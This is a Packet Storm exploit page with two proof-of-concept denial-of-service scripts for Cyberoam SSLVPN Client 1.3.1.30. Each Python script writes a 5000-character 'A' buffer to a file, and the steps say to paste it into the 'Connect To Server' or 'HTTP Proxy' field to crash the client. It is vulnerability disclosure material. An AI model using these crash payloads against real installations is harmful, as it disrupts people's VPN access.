Cyberoam SSLVPN Client version 1.3.1.30 Connect To Server and HTTP Proxy proof of concept denial of service exploits.
10fbba0972f675beabed4bc6c7b9fa2fc4019879caef30f05995225cb5176369#Exploit Title: Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-23
#Vendor Homepage: https://www.cyberoam.com
#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CrSSL_v1.3.1.30.zip
#Tested Version: 1.3.1.30
#Tested on: Windows Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64
#Steps to produce the crash:
#1.- Run python code: c_sslvpn_cts.py
#2.- Open c_sslvpn_cts.txt and copy content to clipboard
#3.- Open Cyberoam SSLVPN Client
#4.- Select Server Settings
#5.- In "Connect To Server" field paste Clipboard
#6.- In "Port" type 80
#7.- Select "OK"
#8.- Crashed!
cod = "\x41" * 5000
f = open('c_sslvpn_cts.txt', 'w')
f.write(cod)
f.close()
#Exploit Title: Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-23
#Vendor Homepage: https://www.cyberoam.com
#Software Link: https://download.cyberoam.com/solution/optionals/i18n/CrSSL_v1.3.1.30.zip
#Tested Version: 1.3.1.30
#Tested on: Windows Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64
#Steps to produce the crash:
#1.- Run python code: c_sslvpn_http.py
#2.- Open c_sslvpn_http.txt and copy content to clipboard
#3.- Open Cyberoam SSLVPN Client
#4.- Select Proxy Settings > Enable "Manual Configuration"
#5.- In "HTTP Proxy" address field paste Clipboard
#6.- In "Port" type 80
#7.- Select "OK"
#8.- Crashed!
cod = "\x41" * 5000
f = open('c_sslvpn_http.txt', 'w')
f.write(cod)
f.close()
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed